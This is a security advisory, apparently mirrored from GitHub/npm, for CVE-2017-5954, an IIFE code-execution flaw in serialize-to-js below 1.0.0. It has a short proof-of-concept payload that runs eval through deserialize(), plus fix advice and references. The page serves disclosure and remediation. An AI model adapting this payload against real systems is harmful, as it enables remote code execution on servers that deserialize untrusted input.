Описание
Code Execution Through IIFE in serialize-to-js
Affected versions of serialize-to-js may be vulnerable to arbitrary code execution through an Immediately Invoked Function Expression (IIFE).
Proof of Concept
var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }"
var serialize = require('serialize-to-js');
serialize.deserialize(payload);
Recommendation
Update to version 1.0.0, or later, and review this disclaimer from the author.
Ссылки
- https://nvd.nist.gov/vuln/detail/CVE-2017-5954
- https://github.com/commenthol/serialize-to-js/issues/1
- https://github.com/commenthol/serialize-to-js/commit/1cd433960e5b9db4c0b537afb28366198a319429
- https://github.com/advisories/GHSA-mm62-wxc8-cf7m
- https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution
- https://www.npmjs.com/advisories/313
- https://www.npmjs.com/package/serialize-to-js#deserialize
- http://www.securityfocus.com/bid/96223
Пакеты
Наименование
serialize-to-js
npm
Затронутые версииВерсия исправления
< 1.0.0
1.0.0
Связанные уязвимости
CVSS3: 9.8
nvd
почти 9 лет назад
An issue was discovered in the serialize-to-js package 0.5.0 for Node.js. Untrusted data passed into the deserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).